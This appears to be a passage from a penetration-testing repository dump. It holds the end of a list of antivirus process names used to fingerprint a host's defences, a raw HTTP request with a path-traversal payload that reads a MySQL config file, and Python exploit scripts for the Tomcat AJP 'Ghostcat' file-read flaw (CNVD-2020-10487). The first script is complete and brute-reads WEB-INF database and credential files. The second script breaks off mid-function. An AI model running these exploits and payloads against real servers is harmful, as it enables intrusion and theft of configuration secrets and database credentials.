282 | "nisum.exe": "Norton", 283 | "nmain.exe": "Norton", 284 | "nod32.exe": "ESET Smart Security", 285 | "norton_internet_secu_3.0_407.exe": "已知杀软进程,名称暂未收录", 286 | "notstart.exe": "已知杀软进程,名称暂未收录", 287 | "nprotect.exe": "Symantec", 288 | "npscheck.exe": "Norton", 289 | "npssvc.exe": "Norton", 290 | "ntrtscan.exe": "趋势反病毒应用程序", 291 | "nui.exe": "已知杀软进程,名称暂未收录", 292 | "otfix.exe": "已知杀软进程,名称暂未收录", 293 | "outpostinstall.exe": "Outpost", 294 | "patch.exe": "趋势科技", 295 | "pavw.exe": "已知杀软进程,名称暂未收录", 296 | "pcscan.exe": "趋势科技", 297 | "pdsetup.exe": "已知杀软进程,名称暂未收录", 298 | "persfw.exe": "Tiny Personal Firewall", 299 | "pgmonitr.exe": "PromulGate SpyWare", 300 | "pingscan.exe": "已知杀软进程,名称暂未收录", 301 | "platin.exe": "已知杀软进程,名称暂未收录", 302 | "pop3trap.exe": "PC-cillin", 303 | "poproxy.exe": "NortonAntiVirus", 304 | "popscan.exe": "已知杀软进程,名称暂未收录", 305 | "powerscan.exe": "Integrated Search Technologies", 306 | "ppinupdt.exe": "已知杀软进程,名称暂未收录", 307 | "pptbc.exe": "已知杀软进程,名称暂未收录", 308 | "ppvstop.exe": "已知杀软进程,名称暂未收录", 309 | "prizesurfer.exe": "Prizesurfer", 310 | "prmt.exe": "OpiStat", 311 | "prmvr.exe": "Adtomi", 312 | "processmonitor.exe": "Sysinternals", 313 | "proport.exe": "已知杀软进程,名称暂未收录", 314 | "protectx.exe": "ProtectX", 315 | "pspf.exe": "已知杀软进程,名称暂未收录", 316 | "purge.exe": "已知杀软进程,名称暂未收录", 317 | "qconsole.exe": "Norton AntiVirus Quarantine Console", 318 | "qserver.exe": "Norton Internet Security", 319 | "rapapp.exe": "BlackICE", 320 | "rb32.exe": "RapidBlaster", 321 | "rcsync.exe": "PrizeSurfer", 322 | "realmon.exe": "Realmon ", 323 | "rescue.exe": "已知杀软进程,名称暂未收录", 324 | "rescue32.exe": "卡巴斯基互联网安全套装", 325 | "rshell.exe": "已知杀软进程,名称暂未收录", 326 | "rtvscn95.exe": "Real-time virus scanner ", 327 | "rulaunch.exe": "McAfee User Interface", 328 | "run32dll.exe": "PAL PC Spy", 329 | "safeweb.exe": "PSafe Tecnologia", 330 | "sbserv.exe": "Norton Antivirus", 331 | "scrscan.exe": "360杀毒", 332 | "sfc.exe": "System file checker", 333 | "sh.exe": "MKS Toolkit for Win3", 334 | "showbehind.exe": "MicroSmarts Enterprise Component ", 335 | "soap.exe": "System Soap Pro", 336 | "sofi.exe": "已知杀软进程,名称暂未收录", 337 | "sperm.exe": "已知杀软进程,名称暂未收录", 338 | "supporter5.exe": "eScorcher反病毒", 339 | "symproxysvc.exe": "Symantec", 340 | "symtray.exe": "Symantec", 341 | "tbscan.exe": "ThunderBYTE", 342 | "tc.exe": "TimeCalende", 343 | "titanin.exe": "TitanHide", 344 | "tvmd.exe": "Total Velocity", 345 | "tvtmd.exe": " Total Velocity", 346 | "vettray.exe": "eTrust", 347 | "vir-help.exe": "已知杀软进程,名称暂未收录", 348 | "vnpc3000.exe": "已知杀软进程,名称暂未收录", 349 | "vpc32.exe": "Symantec", 350 | "vpc42.exe": "Symantec", 351 | "vshwin32.exe": "McAfee", 352 | "vsmain.exe": "McAfee", 353 | "vsstat.exe": "McAfee", 354 | "wfindv32.exe": "已知杀软进程,名称暂未收录", 355 | "zapro.exe": "Zone Alarm", 356 | "zonealarm.exe": "Zone Alarm", 357 | "AVPM.exe": "Kaspersky", 358 | "A2CMD.exe": "Emsisoft Anti-Malware", 359 | "A2SERVICE.exe": "a-squared free", 360 | "A2FREE.exe": "a-squared Free", 361 | "ADVCHK.exe": "Norton AntiVirus", 362 | "AGB.exe": "安天防线", 363 | "AHPROCMONSERVER.exe": "安天防线", 364 | "AIRDEFENSE.exe": "AirDefense", 365 | "ALERTSVC.exe": "Norton AntiVirus", 366 | "AVIRA.exe": "小红伞杀毒", 367 | "AMON.exe": "Tiny Personal Firewall", 368 | "AVZ.exe": "AVZ", 369 | "ANTIVIR.exe": "已知杀软进程,名称暂未收录", 370 | "APVXDWIN.exe": "熊猫卫士", 371 | "ASHMAISV.exe": "Alwil", 372 | "ASHSERV.exe": "Avast Anti-virus", 373 | "ASHSIMPL.exe": "AVAST!VirusCleaner", 374 | "ASHWEBSV.exe": "Avast", 375 | "ASWUPDSV.exe": "Avast", 376 | "ASWSCAN.exe": "Avast", 377 | "AVCIMAN.exe": "熊猫卫士", 378 | "AVCONSOL.exe": "McAfee", 379 | "AVENGINE.exe": "熊猫卫士", 380 | "AVESVC.exe": "Avira AntiVir Security Service", 381 | "AVEVL32.exe": "已知杀软进程,名称暂未收录", 382 | "AVGAM.exe": "AVG", 383 | "AVGCC.exe": "AVG", 384 | "AVGCHSVX.exe": "AVG", 385 | "AVGCSRVX": "AVG", 386 | "AVGNSX.exe": "AVG", 387 | "AVGCC32.exe": "AVG", 388 | "AVGCTRL.exe": "AVG", 389 | "AVGEMC.exe": "AVG", 390 | "AVGFWSRV.exe": "AVG", 391 | "AVGNTMGR.exe": "AVG", 392 | "AVGSERV.exe": "AVG", 393 | "AVGTRAY.exe": "AVG", 394 | "AVGUPSVC.exe": "AVG", 395 | "AVINITNT.exe": "Command AntiVirus for NT Server", 396 | "AVPCC.exe": "Kaspersky", 397 | "AVSERVER.exe": "Kerio MailServer", 398 | "AVSCHED32.exe": "H+BEDV", 399 | "AVSYNMGR.exe": "McAfee", 400 | "AVWUPSRV.exe": "H+BEDV", 401 | "BDSWITCH.exe": "BitDefender Module", 402 | "BLACKD.exe": "BlackICE", 403 | "CCEVTMGR.exe": "Symantec", 404 | "CFP.exe": "COMODO", 405 | "CLAMWIN.exe": "ClamWin Portable", 406 | "CUREIT.exe": "DrWeb CureIT", 407 | "DEFWATCH.exe": "Norton Antivirus", 408 | "DRWADINS.exe": "Dr.Web", 409 | "DRWEB.exe": "Dr.Web", 410 | "DEFENDERDAEMON.exe": "ShadowDefender", 411 | "EWIDOCTRL.exe": "Ewido Security Suite", 412 | "EZANTIVIRUSREGISTRATIONCHECK.exe": "e-Trust Antivirus", 413 | "FIREWALL.exe": "AshampooSoftware", 414 | "FPROTTRAY.exe": "F-PROT Antivirus", 415 | "FPWIN.exe": "Verizon", 416 | "FRESHCLAM.exe": "ClamAV", 417 | "FSAV32.exe": "F-Secure", 418 | "FSBWSYS.exe": "F-secure", 419 | "FSDFWD.exe": "F-Secure", 420 | "FSGK32.exe": "F-Secure", 421 | "FSGK32ST.exe": "F-Secure", 422 | "FSMA32.exe": "F-Secure", 423 | "FSMB32.exe": "F-Secure", 424 | "FSSM32.exe": "F-Secure", 425 | "GUARDGUI.exe": "网游保镖", 426 | "GUARDNT.exe": "IKARUS", 427 | "IAMAPP.exe": "Symantec", 428 | "INOCIT.exe": "eTrust", 429 | "INORPC.exe": "eTrust", 430 | "INORT.exe": "eTrust", 431 | "INOTASK.exe": "eTrust", 432 | "INOUPTNG.exe": "eTrust", 433 | "ISAFE.exe": "eTrust", 434 | "KAV.exe": "Kaspersky", 435 | "KAVMM.exe": "Kaspersky", 436 | "KAVPF.exe": "Kaspersky", 437 | "KAVPFW.exe": "Kaspersky", 438 | "KAVSTART.exe": "Kaspersky", 439 | "KAVSVC.exe": "Kaspersky", 440 | "KAVSVCUI.exe": "Kaspersky", 441 | "KMAILMON.exe": "金山毒霸", 442 | "MCAGENT.exe": "McAfee", 443 | "MCMNHDLR.exe": "McAfee", 444 | "MCREGWIZ.exe": "McAfee", 445 | "MCUPDATE.exe": "McAfee", 446 | "MCVSSHLD.exe": "McAfee", 447 | "MINILOG.exe": "Zone Alarm", 448 | "MYAGTSVC.exe": "McAfee", 449 | "MYAGTTRY.exe": "McAfee", 450 | "NAVAPSVC.exe": "Norton", 451 | "NAVAPW32.exe": "Norton", 452 | "NAVLU32.exe": "Norton", 453 | "NAVW32.exe": "Norton Antivirus", 454 | "NEOWATCHLOG.exe": "NeoWatch", 455 | "NEOWATCHTRAY.exe": "NeoWatch", 456 | "NISSERV.exe": "Norton", 457 | "NISUM.exe": "Norton", 458 | "NMAIN.exe": "Norton", 459 | "NOD32.exe": "ESET NOD32", 460 | "NPFMSG.exe": "Norman个人防火墙", 461 | "NPROTECT.exe": "Symantec", 462 | "NSMDTR.exe": "Norton", 463 | "NTRTSCAN.exe": "趋势科技", 464 | "OFCPFWSVC.exe": "OfficeScanNT", 465 | "ONLINENT.exe": "已知杀软进程,名称暂未收录", 466 | "OP_MON.exe": " OutpostFirewall", 467 | "PAVFIRES.exe": "熊猫卫士", 468 | "PAVFNSVR.exe": "熊猫卫士", 469 | "PAVKRE.exe": "熊猫卫士", 470 | "PAVPROT.exe": "熊猫卫士", 471 | "PAVPROXY.exe": "熊猫卫士", 472 | "PAVPRSRV.exe": "熊猫卫士", 473 | "PAVSRV51.exe": "熊猫卫士", 474 | "PAVSS.exe": "熊猫卫士", 475 | "PCCGUIDE.exe": "PC-cillin", 476 | "PCCIOMON.exe": "PC-cillin", 477 | "PCCNTMON.exe": "PC-cillin", 478 | "PCCPFW.exe": "趋势科技", 479 | "PCCTLCOM.exe": "趋势科技", 480 | "PCTAV.exe": "PC Tools AntiVirus", 481 | "PERSFW.exe": "Tiny Personal Firewall", 482 | "PERVAC.exe": "已知杀软进程,名称暂未收录", 483 | "PESTPATROL.exe": "Ikarus", 484 | "PREVSRV.exe": "熊猫卫士", 485 | "RTVSCN95.exe": "Real-time Virus Scanner", 486 | "SAVADMINSERVICE.exe": "SAV", 487 | "SAVMAIN.exe": "SAV", 488 | "SAVSCAN.exe": "SAV", 489 | "SDHELP.exe": "Spyware Doctor", 490 | "SHSTAT.exe": "McAfee", 491 | "SPBBCSVC.exe": "Symantec", 492 | "SPIDERCPL.exe": "Dr.Web", 493 | "SPIDERML.exe": "Dr.Web", 494 | "SPIDERUI.exe": "Dr.Web", 495 | "SPYBOTSD.exe": "Spybot ", 496 | "SWAGENT.exe": "SonicWALL", 497 | "SWDOCTOR.exe": "SonicWALL", 498 | "SWNETSUP.exe": "Sophos", 499 | "SYMLCSVC.exe": "Symantec", 500 | "SYMPROXYSVC.exe": "Symantec", 501 | "SYMSPORT.exe": "Sysmantec", 502 | "SYMWSC.exe": "Sysmantec", 503 | "SYNMGR.exe": "Sysmantec", 504 | "TMLISTEN.exe": "趋势科技", 505 | "TMNTSRV.exe": "趋势科技", 506 | "TMPROXY.exe": "趋势科技", 507 | "TNBUTIL.exe": "Anti-Virus", 508 | "VBA32ECM.exe": "已知杀软进程,名称暂未收录", 509 | "VBA32IFS.exe": "已知杀软进程,名称暂未收录", 510 | "VBA32PP3.exe": "已知杀软进程,名称暂未收录", 511 | "VCRMON.exe": "VirusChaser", 512 | "VRMONNT.exe": "HAURI", 513 | "VRMONSVC.exe": "HAURI", 514 | "VSHWIN32.exe": "McAfee", 515 | "VSSTAT.exe": "McAfee", 516 | "XCOMMSVR.exe": "BitDefender", 517 | "ZONEALARM.exe": "Zone Alarm", 518 | "360rp.exe": "360杀毒", 519 | "afwServ.exe": " Avast Antivirus", 520 | "safeboxTray.exe": "360杀毒", 521 | "360safebox.exe": "360杀毒", 522 | "QQPCTray.exe": "QQ电脑管家", 523 | "KSafeTray.exe": "金山毒霸", 524 | "KSafeSvc.exe": "金山毒霸", 525 | "KWatch.exe": "金山毒霸", 526 | "gov_defence_service.exe": "云锁", 527 | "gov_defence_daemon.exe": "云锁", 528 | "smartscreen.exe": "Windows Defender", 529 | "SunloginClient.exe": "向日葵", 530 | "finalshell.exe": "finalshell终端管理", 531 | "navicat.exe": "数据库管理", 532 | "AliSecGuard.exe": "阿里云盾", 533 | "AliYunDunUpdate.exe": "阿里云盾", 534 | "AliYunDun.exe": "阿里云盾", 535 | "CmsGoAgent.windows-amd64.": "阿里云监控", -------------------------------------------------------------------------------- /property/test.txt: -------------------------------------------------------------------------------- 1 | POST /mac/gateway.php HTTP/1.1 2 | Host: x.x.x.x 3 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 4 | Content-Length: 43 5 | Charset: utf-8 6 | Content-Type: application/x-www-form-urlencoded 7 | Referer: https://servicewechat.com/wxe1d5f6d5f6c6a21f/5/page-frame.html 8 | Accept-Encoding: gzip 9 | 10 | json={"url":"/general/../../mysql5/my.ini"} 11 | -------------------------------------------------------------------------------- /pythonexp/Tomcat/CNVD-2020-10487-Tomcat-Ajp-lfi.py: -------------------------------------------------------------------------------- 1 | ######f0ng######usage:ip -p port 2 | # -*- coding: utf-8 -*- 3 | 4 | #CNVD-2020-10487 Tomcat-Ajp lfi 5 | 6 | import struct 7 | 8 | # Some references: 9 | # https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html 10 | def pack_string(s): 11 | if s is None: 12 | return struct.pack(">h", -1) 13 | l = len(s) 14 | return struct.pack(">H%dsb" % l, l, s.encode('utf8'), 0) 15 | def unpack(stream, fmt): 16 | size = struct.calcsize(fmt) 17 | buf = stream.read(size) 18 | return struct.unpack(fmt, buf) 19 | def unpack_string(stream): 20 | size, = unpack(stream, ">h") 21 | if size == -1: # null string 22 | return None 23 | res, = unpack(stream, "%ds" % size) 24 | stream.read(1) # \0 25 | return res 26 | class NotFoundException(Exception): 27 | pass 28 | class AjpBodyRequest(object): 29 | # server == web server, container == servlet 30 | SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2) 31 | MAX_REQUEST_LENGTH = 8186 32 | def __init__(self, data_stream, data_len, data_direction=None): 33 | self.data_stream = data_stream 34 | self.data_len = data_len 35 | self.data_direction = data_direction 36 | def serialize(self): 37 | data = self.data_stream.read(AjpBodyRequest.MAX_REQUEST_LENGTH) 38 | if len(data) == 0: 39 | return struct.pack(">bbH", 0x12, 0x34, 0x00) 40 | else: 41 | res = struct.pack(">H", len(data)) 42 | res += data 43 | if self.data_direction == AjpBodyRequest.SERVER_TO_CONTAINER: 44 | header = struct.pack(">bbH", 0x12, 0x34, len(res)) 45 | else: 46 | header = struct.pack(">bbH", 0x41, 0x42, len(res)) 47 | return header + res 48 | def send_and_receive(self, socket, stream): 49 | while True: 50 | data = self.serialize() 51 | socket.send(data) 52 | r = AjpResponse.receive(stream) 53 | while r.prefix_code != AjpResponse.GET_BODY_CHUNK and r.prefix_code != AjpResponse.SEND_HEADERS: 54 | r = AjpResponse.receive(stream) 55 | 56 | if r.prefix_code == AjpResponse.SEND_HEADERS or len(data) == 4: 57 | break 58 | class AjpForwardRequest(object): 59 | _, OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, ACL, REPORT, VERSION_CONTROL, CHECKIN, CHECKOUT, UNCHECKOUT, SEARCH, MKWORKSPACE, UPDATE, LABEL, MERGE, BASELINE_CONTROL, MKACTIVITY = range(28) 60 | REQUEST_METHODS = {'GET': GET, 'POST': POST, 'HEAD': HEAD, 'OPTIONS': OPTIONS, 'PUT': PUT, 'DELETE': DELETE, 'TRACE': TRACE} 61 | # server == web server, container == servlet 62 | SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2) 63 | COMMON_HEADERS = ["SC_REQ_ACCEPT", 64 | "SC_REQ_ACCEPT_CHARSET", "SC_REQ_ACCEPT_ENCODING", "SC_REQ_ACCEPT_LANGUAGE", "SC_REQ_AUTHORIZATION", 65 | "SC_REQ_CONNECTION", "SC_REQ_CONTENT_TYPE", "SC_REQ_CONTENT_LENGTH", "SC_REQ_COOKIE", "SC_REQ_COOKIE2", 66 | "SC_REQ_HOST", "SC_REQ_PRAGMA", "SC_REQ_REFERER", "SC_REQ_USER_AGENT" 67 | ] 68 | ATTRIBUTES = ["context", "servlet_path", "remote_user", "auth_type", "query_string", "route", "ssl_cert", "ssl_cipher", "ssl_session", "req_attribute", "ssl_key_size", "secret", "stored_method"] 69 | def __init__(self, data_direction=None): 70 | self.prefix_code = 0x02 71 | self.method = None 72 | self.protocol = None 73 | self.req_uri = None 74 | self.remote_addr = None 75 | self.remote_host = None 76 | self.server_name = None 77 | self.server_port = None 78 | self.is_ssl = None 79 | self.num_headers = None 80 | self.request_headers = None 81 | self.attributes = None 82 | self.data_direction = data_direction 83 | def pack_headers(self): 84 | self.num_headers = len(self.request_headers) 85 | res = "" 86 | res = struct.pack(">h", self.num_headers) 87 | for h_name in self.request_headers: 88 | if h_name.startswith("SC_REQ"): 89 | code = AjpForwardRequest.COMMON_HEADERS.index(h_name) + 1 90 | res += struct.pack("BB", 0xA0, code) 91 | else: 92 | res += pack_string(h_name) 93 | 94 | res += pack_string(self.request_headers[h_name]) 95 | return res 96 | 97 | def pack_attributes(self): 98 | res = b"" 99 | for attr in self.attributes: 100 | a_name = attr['name'] 101 | code = AjpForwardRequest.ATTRIBUTES.index(a_name) + 1 102 | res += struct.pack("b", code) 103 | if a_name == "req_attribute": 104 | aa_name, a_value = attr['value'] 105 | res += pack_string(aa_name) 106 | res += pack_string(a_value) 107 | else: 108 | res += pack_string(attr['value']) 109 | res += struct.pack("B", 0xFF) 110 | return res 111 | def serialize(self): 112 | res = "" 113 | res = struct.pack("bb", self.prefix_code, self.method) 114 | res += pack_string(self.protocol) 115 | res += pack_string(self.req_uri) 116 | res += pack_string(self.remote_addr) 117 | res += pack_string(self.remote_host) 118 | res += pack_string(self.server_name) 119 | res += struct.pack(">h", self.server_port) 120 | res += struct.pack("?", self.is_ssl) 121 | res += self.pack_headers() 122 | res += self.pack_attributes() 123 | if self.data_direction == AjpForwardRequest.SERVER_TO_CONTAINER: 124 | header = struct.pack(">bbh", 0x12, 0x34, len(res)) 125 | else: 126 | header = struct.pack(">bbh", 0x41, 0x42, len(res)) 127 | return header + res 128 | def parse(self, raw_packet): 129 | stream = StringIO(raw_packet) 130 | self.magic1, self.magic2, data_len = unpack(stream, "bbH") 131 | self.prefix_code, self.method = unpack(stream, "bb") 132 | self.protocol = unpack_string(stream) 133 | self.req_uri = unpack_string(stream) 134 | self.remote_addr = unpack_string(stream) 135 | self.remote_host = unpack_string(stream) 136 | self.server_name = unpack_string(stream) 137 | self.server_port = unpack(stream, ">h") 138 | self.is_ssl = unpack(stream, "?") 139 | self.num_headers, = unpack(stream, ">H") 140 | self.request_headers = {} 141 | for i in range(self.num_headers): 142 | code, = unpack(stream, ">H") 143 | if code > 0xA000: 144 | h_name = AjpForwardRequest.COMMON_HEADERS[code - 0xA001] 145 | else: 146 | h_name = unpack(stream, "%ds" % code) 147 | stream.read(1) # \0 148 | h_value = unpack_string(stream) 149 | self.request_headers[h_name] = h_value 150 | def send_and_receive(self, socket, stream, save_cookies=False): 151 | res = [] 152 | i = socket.sendall(self.serialize()) 153 | if self.method == AjpForwardRequest.POST: 154 | return res 155 | 156 | r = AjpResponse.receive(stream) 157 | assert r.prefix_code == AjpResponse.SEND_HEADERS 158 | res.append(r) 159 | if save_cookies and 'Set-Cookie' in r.response_headers: 160 | self.headers['SC_REQ_COOKIE'] = r.response_headers['Set-Cookie'] 161 | 162 | # read body chunks and end response packets 163 | while True: 164 | r = AjpResponse.receive(stream) 165 | res.append(r) 166 | if r.prefix_code == AjpResponse.END_RESPONSE: 167 | break 168 | elif r.prefix_code == AjpResponse.SEND_BODY_CHUNK: 169 | continue 170 | else: 171 | raise NotImplementedError 172 | break 173 | 174 | return res 175 | 176 | class AjpResponse(object): 177 | _,_,_,SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE, GET_BODY_CHUNK = range(7) 178 | COMMON_SEND_HEADERS = [ 179 | "Content-Type", "Content-Language", "Content-Length", "Date", "Last-Modified", 180 | "Location", "Set-Cookie", "Set-Cookie2", "Servlet-Engine", "Status", "WWW-Authenticate" 181 | ] 182 | def parse(self, stream): 183 | # read headers 184 | self.magic, self.data_length, self.prefix_code = unpack(stream, ">HHb") 185 | 186 | if self.prefix_code == AjpResponse.SEND_HEADERS: 187 | self.parse_send_headers(stream) 188 | elif self.prefix_code == AjpResponse.SEND_BODY_CHUNK: 189 | self.parse_send_body_chunk(stream) 190 | elif self.prefix_code == AjpResponse.END_RESPONSE: 191 | self.parse_end_response(stream) 192 | elif self.prefix_code == AjpResponse.GET_BODY_CHUNK: 193 | self.parse_get_body_chunk(stream) 194 | else: 195 | raise NotImplementedError 196 | 197 | def parse_send_headers(self, stream): 198 | self.http_status_code, = unpack(stream, ">H") 199 | self.http_status_msg = unpack_string(stream) 200 | self.num_headers, = unpack(stream, ">H") 201 | self.response_headers = {} 202 | for i in range(self.num_headers): 203 | code, = unpack(stream, ">H") 204 | if code <= 0xA000: # custom header 205 | h_name, = unpack(stream, "%ds" % code) 206 | stream.read(1) # \0 207 | h_value = unpack_string(stream) 208 | else: 209 | h_name = AjpResponse.COMMON_SEND_HEADERS[code-0xA001] 210 | h_value = unpack_string(stream) 211 | self.response_headers[h_name] = h_value 212 | 213 | def parse_send_body_chunk(self, stream): 214 | self.data_length, = unpack(stream, ">H") 215 | self.data = stream.read(self.data_length+1) 216 | 217 | def parse_end_response(self, stream): 218 | self.reuse, = unpack(stream, "b") 219 | 220 | def parse_get_body_chunk(self, stream): 221 | rlen, = unpack(stream, ">H") 222 | return rlen 223 | 224 | @staticmethod 225 | def receive(stream): 226 | r = AjpResponse() 227 | r.parse(stream) 228 | return r 229 | 230 | import socket 231 | 232 | def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET): 233 | fr = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER) 234 | fr.method = method 235 | fr.protocol = "HTTP/1.1" 236 | fr.req_uri = req_uri 237 | fr.remote_addr = target_host 238 | fr.remote_host = None 239 | fr.server_name = target_host 240 | fr.server_port = 80 241 | fr.request_headers = { 242 | 'SC_REQ_ACCEPT': 'text/html', 243 | 'SC_REQ_CONNECTION': 'keep-alive', 244 | 'SC_REQ_CONTENT_LENGTH': '0', 245 | 'SC_REQ_HOST': target_host, 246 | 'SC_REQ_USER_AGENT': 'Mozilla', 247 | 'Accept-Encoding': 'gzip, deflate, sdch', 248 | 'Accept-Language': 'en-US,en;q=0.5', 249 | 'Upgrade-Insecure-Requests': '1', 250 | 'Cache-Control': 'max-age=0' 251 | } 252 | fr.is_ssl = False 253 | fr.attributes = [] 254 | return fr 255 | 256 | class Tomcat(object): 257 | def __init__(self, target_host, target_port): 258 | self.target_host = target_host 259 | self.target_port = target_port 260 | 261 | self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 262 | self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 263 | self.socket.connect((target_host, target_port)) 264 | self.stream = self.socket.makefile("rb", bufsize=0) 265 | 266 | def perform_request(self, req_uri, headers={}, method='GET', user=None, password=None, attributes=[]): 267 | self.req_uri = req_uri 268 | self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri, method=AjpForwardRequest.REQUEST_METHODS.get(method)) 269 | print("Getting resource at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri)) 270 | if user is not None and password is not None: 271 | self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + ("%s:%s" % (user, password)).encode('base64').replace('\n', '') 272 | for h in headers: 273 | self.forward_request.request_headers[h] = headers[h] 274 | for a in attributes: 275 | self.forward_request.attributes.append(a) 276 | responses = self.forward_request.send_and_receive(self.socket, self.stream) 277 | if len(responses) == 0: 278 | return None, None 279 | snd_hdrs_res = responses[0] 280 | data_res = responses[1:-1] 281 | if len(data_res) == 0: 282 | print("No data in response. Headers:%s\n" % snd_hdrs_res.response_headers) 283 | return snd_hdrs_res, data_res 284 | 285 | ''' 286 | javax.servlet.include.request_uri 287 | javax.servlet.include.path_info 288 | javax.servlet.include.servlet_path 289 | ''' 290 | 291 | import argparse 292 | parser = argparse.ArgumentParser() 293 | parser.add_argument("target", type=str, help="Hostname or IP to attack") 294 | parser.add_argument('-p', '--port', type=int, default=8009, help="AJP port to attack (default is 8009)") 295 | parser.add_argument("-f", '--file', type=str, default='WEB-INF/web.xml', help="file path :(WEB-INF/web.xml)") 296 | args = parser.parse_args() 297 | t = Tomcat(args.target, args.port) 298 | 299 | _,data = t.perform_request('/asdf',attributes=[ 300 | {'name':'req_attribute','value':['javax.servlet.include.request_uri','/']}, 301 | {'name':'req_attribute','value':['javax.servlet.include.path_info',args.file]}, 302 | {'name':'req_attribute','value':['javax.servlet.include.servlet_path','/']}, 303 | ]) 304 | print('----------------------------') 305 | print("".join([d.data for d in data])) 306 | 307 | if "WEB-INF" in "".join([d.data for d in data]): 308 | print("**********************注意可能有WEB-INF配置文件*************************") 309 | 310 | words_list = ['WEB-INF/classes/application-config.xml','WEB-INF/classes/application-druid.yml','WEB-INF/classes/jdbc.properties','WEB-INF/classes/db.properties', 311 | 'WEB-INF/classes/database.properties','WEB-INF/classes/datasource.properties','WEB-INF/classes/mybatis.properties','WEB-INF/classes/application.properties',] 312 | 313 | for word in words_list: 314 | 315 | print(":::::::::" + word + ":::::::::") 316 | 317 | _,data = t.perform_request('/asdf',attributes=[ 318 | {'name':'req_attribute','value':['javax.servlet.include.request_uri','/']}, 319 | {'name':'req_attribute','value':['javax.servlet.include.path_info',word]}, 320 | {'name':'req_attribute','value':['javax.servlet.include.servlet_path','/']}, 321 | ]) 322 | print('----------------------------') 323 | if "Error report" in "".join([d.data for d in data]): 324 | pass 325 | else: 326 | print("".join([d.data for d in data])) 327 | -------------------------------------------------------------------------------- /pythonexp/Tomcat/CNVD-2020-10487-pro.py: -------------------------------------------------------------------------------- 1 | ######f0ng######usage:ip -p port 2 | # -*- coding:utf-8 -*- 3 | # 4 | # Julien Legras - Synacktiv 5 | # 6 | # THIS SOFTWARE IS PROVIDED BY SYNACKTIV ''AS IS'' AND ANY 7 | # EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 8 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 9 | # DISCLAIMED. IN NO EVENT SHALL SYNACKTIV BE LIABLE FOR ANY 10 | # DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 11 | # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 12 | # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND 13 | # ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 14 | # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 15 | # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 16 | 17 | 18 | from ajpy.ajp import AjpResponse, AjpForwardRequest, AjpBodyRequest, NotFoundException 19 | from pprint import pprint, pformat 20 | 21 | import socket 22 | import argparse 23 | import logging 24 | import re 25 | import os 26 | from StringIO import StringIO 27 | import logging 28 | from colorlog import ColoredFormatter 29 | from urllib import unquote 30 | 31 | 32 | def setup_logger(): 33 | """Return a logger with a default ColoredFormatter.""" 34 | formatter = ColoredFormatter( 35 | "[%(asctime)s.%(msecs)03d] %(log_color)s%(levelname)-8s%(reset)s %(white)s%(message)s", 36 | datefmt="%Y-%m-%d %H:%M:%S", 37 | reset=True, 38 | log_colors={ 39 | 'DEBUG': 'bold_purple', 40 | 'INFO': 'bold_green', 41 | 'WARNING': 'bold_yellow', 42 | 'ERROR': 'bold_red', 43 | 'CRITICAL': 'bold_red', 44 | } 45 | ) 46 | 47 | logger = logging.getLogger('meow') 48 | handler = logging.StreamHandler() 49 | handler.setFormatter(formatter) 50 | logger.addHandler(handler) 51 | logger.setLevel(logging.DEBUG) 52 | 53 | return logger 54 | 55 | 56 | logger = setup_logger() 57 | 58 | 59 | # helpers 60 | def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET): 61 | fr = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER) 62 | fr.method = method 63 | fr.protocol = "HTTP/1.1" 64 | fr.req_uri = req_uri 65 | fr.remote_addr = target_host 66 | fr.remote_host = None 67 | fr.server_name = target_host 68 | fr.server_port = 80 69 | fr.request_headers = { 70 | 'SC_REQ_ACCEPT': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 71 | 'SC_REQ_CONNECTION': 'keep-alive', 72 | 'SC_REQ_CONTENT_LENGTH': '0', 73 | 'SC_REQ_HOST': target_host, 74 | 'SC_REQ_USER_AGENT': 'Mozilla/5.0 (X11; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0', 75 | 'Accept-Encoding': 'gzip, deflate, sdch', 76 | 'Accept-Language': 'en-US,en;q=0.5', 77 | 'Upgrade-Insecure-Requests': '1', 78 | 'Cache-Control': 'max-age=0' 79 | } 80 | fr.is_ssl = False 81 | 82 | fr.attributes = [] 83 | 84 | return fr 85 | 86 | 87 | class Tomcat(object): 88 | def __init__(self, target_host, target_port): 89 | self.target_host = target_host 90 | self.target_port = target_port 91 | 92 | self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 93 | self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 94 | self.socket.connect((target_host, target_port)) 95 | self.stream = self.socket.makefile("rb", bufsize=0) 96 | 97 | def test_password(self, user, password): 98 | res = False 99 | stop = False 100 | self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + ("%s:%s" % (user, password)).encode( 101 | 'base64').replace('\n', '') 102 | while not stop: 103 | logger.debug("testing 